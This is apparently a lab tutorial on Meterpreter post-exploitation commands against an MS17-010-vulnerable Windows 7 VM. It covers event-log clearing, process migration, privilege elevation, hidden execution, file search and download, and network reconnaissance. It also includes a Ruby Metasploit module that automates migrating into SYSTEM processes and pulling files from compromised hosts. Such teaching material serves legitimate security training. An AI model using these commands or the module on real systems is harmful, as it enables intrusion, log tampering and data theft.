Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands

This post reviews some of the most commonly used post-exploitation commands in Meterpreter and Metasploit.
In this first video, we cover the Core, System, Networking and File System commands.

LAB details - VM names and IP addresses


Kali6 (Kali Linux, attacker VM): 192.168.254.142
W7x64-1 (Windows 7, target VM): 192.168.254.70
W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99
Domain name: TESTLAB3

Exploitation process


The Windows 7 test machine is vulnerable to MS17-010 (the SMBv1 flaw targeted by EternalBlue). For exploitation, we follow the steps detailed in the previous post:
MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Core and System commands


We will start with Core and System commands and obviously the first command should be ... HELP !  :-)

1. help

See below the help output for the Core and System commands:



2. sysinfo

Use "sysinfo" to get essential information about the target computer:
machine name, operating system, OS architecture (x86/x64), system language, domain name, logged-on users, and the architecture of the Meterpreter payload itself (the "Meterpreter" line, which matters later when choosing a process to migrate into).


3. getuid

The Meterpreter server runs on the target computer under a specific user context, and that context determines what the attacker can do there. Ideally we want the highest level of permissions: NT AUTHORITY\SYSTEM (the LocalSystem account, which sits above a local administrator), or at least a local administrator.
The "getuid" command displays the user context under which Meterpreter is running.
In our case, Meterpreter is running as NT AUTHORITY\SYSTEM, so it already has every permission available on the local machine.


4. background

There are situations when we successfully exploit a target and get a Meterpreter prompt, but need to get back to the Metasploit (msfconsole) prompt to run other commands, without disconnecting the Meterpreter session we just established.
In that situation we run the "background" command. The Meterpreter session is sent to the background and we return to the Metasploit prompt; the session stays connected, waiting to be resumed.


5. sessions -l (or sessions)

Let's say that we successfully exploited multiple targets and have multiple Meterpreter sessions running in the background.
The "sessions" command, depending on the option used, lets us list, resume or terminate those sessions. See all the available options in the picture below:


"sessions -l" (or "sessions") will list all the active Meterpreter sessions


A Meterpreter session is identified by the session ID number.
(Session ID is 1 in the picture shown above)

6. sessions -i <Session_ID>

This command will resume interaction with a Meterpreter session that was previously sent to background. We will get back to the Meterpreter prompt.


7. clearev

The "clearev" command removes all records from the Application, System and Security event logs on the target computer.
Be aware that this is not quiet: clearing the Security log writes Event ID 1102 ("The audit log was cleared") into that same log, clearing the System log writes Event ID 104, and any log forwarding already in place has long since shipped the earlier events elsewhere. For defenders these are high-fidelity alerts.


8. localtime

This command will display the date and time on the target computer


9. ps 

The "ps" command will list all the processes running on the target computer ...


Note that each process is identified by a process ID number or PID
Also, each process runs under a user context

For example - lsass.exe has PID 512 and runs under the SYSTEM user context

10. ps -U <user_context>

This command will list only the processes running under the specified user context

Example:
ps -U 'TESTLAB3\\testuser1'


11. ps -s

This command will list all the processes running under the SYSTEM user context



12. pgrep <Process_Name>

This command will return the PID for the specified process name

Example:
pgrep wordpad


13. getpid

The "getpid" command will return the PID under which the Meterpreter server is currently running



In this case, the PID is 1040

14. migrate <New_PID>

This command migrates the Meterpreter server from the current process into the process with <New_PID>. The payload is injected into the new process and the session carries on from there; from then on the session lives and dies with that process, so choose a long-lived one that you have the rights to open (as SYSTEM, practically any). lsass.exe (PID 512 in our example) works on this Windows 7 lab, but it is a fragile choice: if it crashes, Windows reboots, and on newer systems LSA protection (RunAsPPL) blocks injection into it altogether. spoolsv.exe or a SYSTEM-owned svchost.exe are usually safer targets.

Example:
migrate 512


15. kill <PID>

This command will terminate a process running on the target computer, having the specified <PID>

Example:
kill 2920


16. pkill <Process_Name>

This command will terminate a process specified by name


17. getsystem

This command attempts to elevate the Meterpreter session to NT AUTHORITY\SYSTEM (the LocalSystem account, which sits above a local administrator) by trying several techniques in turn, such as named-pipe impersonation and token duplication. Those techniques need the session to already be running as a local administrator with a high-integrity token; from a plain user account "getsystem" fails, and a separate privilege-escalation step (a local exploit or a UAC bypass, for example) is needed first.
In our lab, Meterpreter is already running under the SYSTEM user context, so "getsystem" has nothing left to do.


18. shell

This command will launch a system command shell on the target machine. After that, we can run any commands directly on the target machine.
"exit" will terminate the command shell and we will get back to the Meterpreter prompt.


19. execute

This command executes a specified command or application on the target machine, with control over how the process is created.
Check the available options in the picture below:


Example:
execute -f cmd.exe -i -H
will launch a command shell on the target machine: -f names the executable, -H creates the process with a hidden window (it is still listed by "ps" and Task Manager, so this hides it from the user at the console, not from a defender), and -i lets us interact with the shell as soon as it is created.


20. reboot

This command will reboot the target computer. See the available options in the picture below:



File System commands




21. show_mount

This command will list all the logical drives and mount points available on the target computer


22. lpwd

The "lpwd" command will display the local working directory, on the Kali computer


23. lcd <New_Path>

This command allows changing the local working directory to <New_Path>

Example:
lcd /root/TEMP


24. pwd

"pwd" will display the remote working directory, on the target machine


25. cd <New_Path>

This command will change the remote working directory to <New_Path>

Example:
cd \



Note: Unless a particular directory is specified, the File System commands below operate on the local and/or remote working directories set with "lcd" and "cd".

26. dir or ls

This command will list the files located in the remote working directory (on the target computer)



Of course, we can also use this command by specifying a particular directory. 

27. cat <File_Name>

The "cat" command will display the contents of the specified file, to the screen

Example:
cat test1.txt


28. search

This command searches for files by name or pattern on the target computer. Useful options: -d sets the directory to start in, -f is the file name or glob, and -r controls whether subdirectories are searched (recursion is on by default, so a search from the drive root can take a long time on a large disk).

Example:
search -f *.txt -d 'c:\\TMP'
will search for text files in the c:\TMP directory (and its subdirectories) on the target computer


29. edit

This command opens the specified remote file in a local vi-style editor: the file is downloaded to the Kali box, edited there, and uploaded back to the target when saved (which updates its modification time on the target).

Example:
edit C:\\TMP\\test1.txt
Use :wq to save the changes, or :qa! to exit without saving


30. download

This command will download files from the target computer to the local Kali computer

Examples:
download c:\\tmp\\test1.txt
will download the c:\tmp\test1.txt file to the local working directory.
download *.jpg
will download the JPEG files located in the remote working directory to the local working directory


31. rm

The "rm" command will delete the specified file(s) from the target computer

Example:
rm test3.txt


32. upload

This command will upload files from the local Kali computer to the target computer.

Example:
upload test3.txt
will upload the test3.txt file located in the local working directory, to the remote working directory, on the target computer
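As an added example (not code from the original post, nor from the Metasploit project), here is the same post-exploitation flow scripted as a Metasploit post module in Ruby, which is how you would automate it across many sessions instead of typing the commands one by one. It covers the Core/System steps above (sysinfo, getuid, ps, getpid, migrate) and the File System steps (search, download). The migration-target selection and the loot filter are plain Ruby and run outside Metasploit; the module class, its name, its option names (SEARCH_DIR, GLOB, MAX_SIZE, LOCAL_DIR) and the sample process and file lists are all constructed for this illustration, and the preference for spoolsv.exe/svchost.exe plus the avoid-list are the editor's choices, not Metasploit defaults.

```ruby
require 'fileutils'

# Added example for the tutorial, not part of the original post or of Metasploit.
# Helper logic is plain Ruby so it runs offline; the Msf::Post wrapper at the bottom
# is only defined when the file is loaded inside msfconsole.
module MeterpreterHelpers
  module_function

  SYSTEM_USER = 'NT AUTHORITY\\SYSTEM'.freeze
  # Never migrate into these: if the injected thread crashes them, Windows goes down
  # too (lsass may also be LSA-protected, which blocks injection outright).
  AVOID     = %w[system smss.exe csrss.exe wininit.exe services.exe lsass.exe].freeze
  # Long-lived SYSTEM processes that tolerate an extra thread, in order of preference
  # (editor's choice, not a Metasploit default).
  PREFERRED = %w[spoolsv.exe svchost.exe winlogon.exe].freeze

  # Constructed sample data in the shape of session.sys.process.get_processes and
  # session.fs.file.search; PIDs 512/1040/2920 echo the screenshots in the post.
  SAMPLE_PROCESSES = [
    { 'pid' => 4,    'name' => 'System',       'user' => SYSTEM_USER,           'arch' => 'x64' },
    { 'pid' => 512,  'name' => 'lsass.exe',    'user' => SYSTEM_USER,           'arch' => 'x64' },
    { 'pid' => 600,  'name' => 'svchost.exe',  'user' => SYSTEM_USER,           'arch' => 'x86' },
    { 'pid' => 856,  'name' => 'svchost.exe',  'user' => SYSTEM_USER,           'arch' => 'x64' },
    { 'pid' => 1040, 'name' => 'spoolsv.exe',  'user' => SYSTEM_USER,           'arch' => 'x64' },
    { 'pid' => 2032, 'name' => 'explorer.exe', 'user' => 'TESTLAB3\\testuser1', 'arch' => 'x64' },
    { 'pid' => 2920, 'name' => 'wordpad.exe',  'user' => 'TESTLAB3\\testuser1', 'arch' => 'x64' }
  ].freeze
  SAMPLE_SEARCH = [
    { 'path' => 'C:\\TMP',      'name' => 'test1.txt', 'size' => 48 },
    { 'path' => 'C:\\TMP',      'name' => 'empty.txt', 'size' => 0 },
    { 'path' => 'C:\\TMP\\sub', 'name' => 'test1.txt', 'size' => 12 },
    { 'path' => 'C:\\TMP',      'name' => 'big.log',   'size' => 5_000_000 },
    { 'path' => 'C:\\TMP',      'name' => 'test1.txt', 'size' => 48 } # duplicate hit
  ].freeze

  # Where to "migrate": a SYSTEM-owned, non-critical process other than our own,
  # preferring PREFERRED names, then the payload's own architecture, then lowest PID.
  # Returns the process hash, or nil when nothing qualifies.
  def pick_migration_target(processes, current_pid:, arch:)
    candidates = processes.select do |p|
      p['user'] == SYSTEM_USER && p['pid'] != current_pid &&
        !AVOID.include?(p['name'].to_s.downcase)
    end
    candidates.min_by do |p|
      rank = PREFERRED.index(p['name'].to_s.downcase) || PREFERRED.size
      [rank, p['arch'] == arch ? 0 : 1, p['pid']]
    end
  end

  # Filter "search" hits before "download": drop empty and oversized files, collapse
  # duplicate hits, smallest first so useful data lands even if the session drops.
  def select_loot(results, max_size:)
    results.select { |f| f['size'].to_i.between?(1, max_size) }
           .uniq { |f| "#{f['path']}\\#{f['name']}" }
           .sort_by { |f| f['size'].to_i }
  end

  # C:\TMP\sub\test1.txt -> C_TMP_sub_test1.txt, so same-named files from different
  # remote directories do not overwrite each other in the local working directory.
  def flat_local_name(remote_path)
    remote_path.gsub(%r{[:\\/]+}, '_')
  end
end

if defined?(Msf::Post) # only true when loaded by msfconsole (e.g. via loadpath)
  class MetasploitModule < Msf::Post
    def initialize(info = {})
      super(update_info(info,
        'Name'         => 'Tutorial example: migrate to a stable SYSTEM process and collect files',
        'Description'  => 'Illustrative module for the Meterpreter command tutorial.',
        'License'      => MSF_LICENSE,
        'Author'       => ['tutorial example'],
        'Platform'     => ['win'],
        'SessionTypes' => ['meterpreter']))
      register_options([
        OptString.new('SEARCH_DIR', [true, 'Remote directory to search (search -d)', 'C:\\TMP']),
        OptString.new('GLOB',       [true, 'File pattern (search -f)', '*.txt']),
        OptInt.new('MAX_SIZE',      [true, 'Skip files larger than this many bytes', 1_048_576]),
        OptString.new('LOCAL_DIR',  [true, 'Local download directory (like lcd)', '/root/TEMP'])
      ])
    end

    def run
      info = session.sys.config.sysinfo                                          # sysinfo
      print_status("#{info['Computer']} #{info['OS']} #{info['Architecture']} as #{session.sys.config.getuid}")
      me = session.sys.process.getpid                                            # getpid
      target = MeterpreterHelpers.pick_migration_target(
        session.sys.process.get_processes, current_pid: me, arch: session.arch) # ps
      if target
        print_status("Migrating #{me} -> #{target['pid']} (#{target['name']})")
        session.core.migrate(target['pid'])                                      # migrate <pid>
      else
        print_error('No suitable SYSTEM process found; staying in the current one')
      end
      hits = session.fs.file.search(datastore['SEARCH_DIR'], datastore['GLOB'], true) # search -d -f
      ::FileUtils.mkdir_p(datastore['LOCAL_DIR'])
      MeterpreterHelpers.select_loot(hits, max_size: datastore['MAX_SIZE']).each do |f|
        remote = "#{f['path']}\\#{f['name']}"
        local  = ::File.join(datastore['LOCAL_DIR'], MeterpreterHelpers.flat_local_name(remote))
        session.fs.file.download_file(local, remote)                             # download
        print_good("#{remote} -> #{local}")
      end
    end
  end
end
```

Inside msfconsole the file is picked up with "loadpath" from a directory tree of the form post/windows/gather/, then used like any post module with SESSION set to the backgrounded session ID. Against the sample process list, the selector skips lsass.exe and the System process entirely, skips our own PID 1040 (spoolsv.exe), and prefers the x64 svchost.exe over the x86 one; the loot filter turns the five search hits into two downloads.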



Networking commands



33. arp

This command displays the ARP cache on the target computer, a quick way to spot other live hosts on the same subnet without sending a single probe packet


34. ipconfig or ifconfig

This command displays the network interfaces and their IP configuration on the target computer


35. netstat

This command will provide information about protocols in use and network connections, on the target computer 


36. route

This command displays and modifies the routing table on the target computer. Do not confuse it with the "route" command at the msfconsole prompt (outside Meterpreter), which adds routes through a session so that other Metasploit modules can reach networks behind the target; that one changes nothing on the target itself.


37. resolve

This command resolves host names using the target computer's own resolver, so it shows what the target can reach by name (for example internal hosts that our Kali box cannot look up)

Example:
resolve w2008r21
will resolve the "w2008r21" name (that's the lab DC name)

